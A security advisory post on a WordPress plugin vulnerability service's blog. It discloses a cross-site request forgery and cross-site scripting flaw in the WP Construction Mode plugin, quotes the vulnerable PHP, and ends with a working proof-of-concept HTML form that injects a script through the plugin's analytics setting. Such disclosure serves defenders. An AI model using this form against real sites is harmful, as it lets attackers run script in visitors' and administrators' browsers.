16 Jan

One of the 1,000 Most Popular WordPress Plugins Contains a CSRF/XSS Vulnerability

Among the many things we do to provide our customers with the best data on vulnerabilities in any WordPress plugins they use is that we keep track of any of the 1,000 most popular plugins being closed on the WordPress Plugin Directory in case that might be due to a security vulnerability. Yesterday one of those plugins, WP Construction Mode, was closed. No reason has been given for that closure so far, but in just our quick check over the plugin we found a security vulnerability that could have led to it being removed, that is a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability when saving the plugin’s settings.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.

Technical Details

The plugin registers an admin page to be accessible to those with “manage_options” capability (which normally only Administrators have), which when accessed causes the function show_under_construction_menu() to run:

add_menu_page( 'Construction Mode', 'Construction Mode', 'manage_options', 'under_construction', array($this, 'show_under_construction_menu'), 'dashicons-hammer');

When that function, which is located in the file /inc/class/class.smartcat-construction.php, runs, if the GET or POST input “smartcat_construction_save” is set to “update” then the plugins settings will be changed to the value in the GET or POST input “smartcat_construction_options”:

public function show_under_construction_menu() {
	if ( isset( $_REQUEST[ 'smartcat_construction_save' ] ) && $_REQUEST[ 'smartcat_construction_save' ] == 'Update' ) :
		update_option( 'smartcat_construction_options', $_REQUEST[ 'smartcat_construction_options' ] );

There should be a check for a valid nonce to prevent cross-site request forgery (CSRF) before changing the plugin’s settings.

One of the plugin’s settings, “Analytics Code”, is intended to include JavaScript code, so an attacker could use that to include malicious code on fronted pages of the website by also setting the plugin’s Maintenance Mode to be enabled.

Proof of Concept

The following proof of concept will cause the message “XSS” to be shown in an alert box on the frontend pages of the websites, when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin.php?page=under_construction" method="POST">
<input type="hidden" name="smartcat_construction_save" value="Update" />
<input type="hidden" name="smartcat_construction_options[mode]" value="1" />
<input type="hidden" name="smartcat_construction_options[set_page]" value="all" />
<input type="hidden" name="smartcat_construction_options[analytics]" value='<script>alert("XSS");</script>' />
<input type="submit" value="Submit" />

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.